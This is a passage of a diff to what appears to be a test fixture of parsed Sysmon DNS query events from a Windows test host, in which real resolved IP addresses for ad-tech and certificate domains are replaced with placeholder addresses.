Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.mathtag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pixel-origin.mathtag.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -11553,12 +11432,12 @@ "type": "CNAME" }, { - "data": "72.21.91.29", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "72.21.91.29" + "89.160.20.156" ] }, "network": { @@ -11575,13 +11454,13 @@ "status.rapidssl.com" ], "ip": [ - "72.21.91.29" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741886500Z", + "ingested": "2021-12-09T13:50:23.457257100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692814000Z'/\u003e\u003cEventRecordID\u003e142\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.rapidssl.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692814000Z'/\u003e\u003cEventRecordID\u003e142\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.rapidssl.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -11645,39 +11524,39 @@ "type": "CNAME" }, { - "data": "34.197.195.131", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.192.39.82", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.199.231.204", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.199.113.81", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.197.3.157", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.205.112.156", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.195.29.8", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.201.247.123", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -11685,22 +11564,22 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" } ], "resolved_ip": [ - "34.197.195.131", - "34.192.39.82", - "34.199.231.204", - "34.199.113.81", - "34.197.3.157", - "34.205.112.156", - "34.195.29.8", - "34.201.247.123", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "network": { @@ -11716,23 +11595,16 @@ "sync.extend.tv" ], "ip": [ - "34.197.195.131", - "34.192.39.82", - "34.199.231.204", - "34.199.113.81", - "34.197.3.157", - "34.205.112.156", - "34.195.29.8", - "34.201.247.123", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741892700Z", + "ingested": "2021-12-09T13:50:23.457263100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692826300Z'/\u003e\u003cEventRecordID\u003e143\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.extend.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cookiesyncing-1395500543.us-east-1.elb.amazonaws.com;::ffff:34.197.195.131;::ffff:34.192.39.82;::ffff:34.199.231.204;::ffff:34.199.113.81;::ffff:34.197.3.157;::ffff:34.205.112.156;::ffff:34.195.29.8;::ffff:34.201.247.123;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692826300Z'/\u003e\u003cEventRecordID\u003e143\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.extend.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cookiesyncing-1395500543.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -11796,11 +11668,11 @@ "type": "CNAME" }, { - "data": "151.139.128.14", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -11808,7 +11680,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -11816,7 +11688,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -11824,7 +11696,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -11832,21 +11704,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -11862,22 +11734,22 @@ "ocsp.comodoca.com" ], "ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741898500Z", + "ingested": "2021-12-09T13:50:23.457268900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692837600Z'/\u003e\u003cEventRecordID\u003e144\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.185\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692837600Z'/\u003e\u003cEventRecordID\u003e144\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.185\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -11949,27 +11821,27 @@ "type": "CNAME" }, { - "data": "151.101.2.49", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.66.49", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.130.49", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.194.49", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "151.101.2.49", - "151.101.66.49", - "151.101.130.49", - "151.101.194.49" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -11987,16 +11859,13 @@ "sync-tm.everesttech.net" ], "ip": [ - "151.101.2.49", - "151.101.66.49", - "151.101.130.49", - "151.101.194.49" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741906Z", + "ingested": "2021-12-09T13:50:23.457274700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692848900Z'/\u003e\u003cEventRecordID\u003e145\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.189\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync-tm.everesttech.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.tubemogul.com;type: 5 syncf.tubemogul.com;type: 5 h2.shared.global.fastly.net;::ffff:151.101.2.49;::ffff:151.101.66.49;::ffff:151.101.130.49;::ffff:151.101.194.49;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692848900Z'/\u003e\u003cEventRecordID\u003e145\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.189\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync-tm.everesttech.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.tubemogul.com;type: 5 syncf.tubemogul.com;type: 5 h2.shared.global.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -12056,11 +11925,11 @@ }, "answers": [ { - "data": "34.95.92.78", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -12068,7 +11937,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -12076,7 +11945,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -12084,7 +11953,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -12092,7 +11961,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -12100,23 +11969,23 @@ "type": "AAAA" }, { - "data": "192.35.51.30", + "data": "192.168.51.30", "type": "A" } ], "resolved_ip": [ - "34.95.92.78", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "network": { @@ -12131,24 +12000,24 @@ "idsync.rlcdn.com" ], "ip": [ - "34.95.92.78", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741914800Z", + "ingested": "2021-12-09T13:50:23.457280500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692865100Z'/\u003e\u003cEventRecordID\u003e146\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.237\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidsync.rlcdn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:34.95.92.78;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692865100Z'/\u003e\u003cEventRecordID\u003e146\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.237\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidsync.rlcdn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -12212,37 +12081,37 @@ "type": "CNAME" }, { - "data": "37.157.2.239", + "data": "89.160.20.156", "type": "A" }, { - "data": "37.157.6.253", + "data": "89.160.20.156", "type": "A" }, { - "data": "37.157.2.238", + "data": "89.160.20.156", "type": "A" }, { - "data": "37.157.4.25", + "data": "89.160.20.156", "type": "A" }, { - "data": "37.157.4.24", + "data": "89.160.20.156", "type": "A" }, { - "data": "37.157.6.247", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "37.157.2.239", - "37.157.6.253", - "37.157.2.238", - "37.157.4.25", - "37.157.4.24", - "37.157.6.247" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -12258,18 +12127,13 @@ "cm.adform.net" ], "ip": [ - "37.157.2.239", - "37.157.6.253", - "37.157.2.238", - "37.157.4.25", - "37.157.4.24", - "37.157.6.247" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741923300Z", + "ingested": "2021-12-09T13:50:23.457286100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692882700Z'/\u003e\u003cEventRecordID\u003e147\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 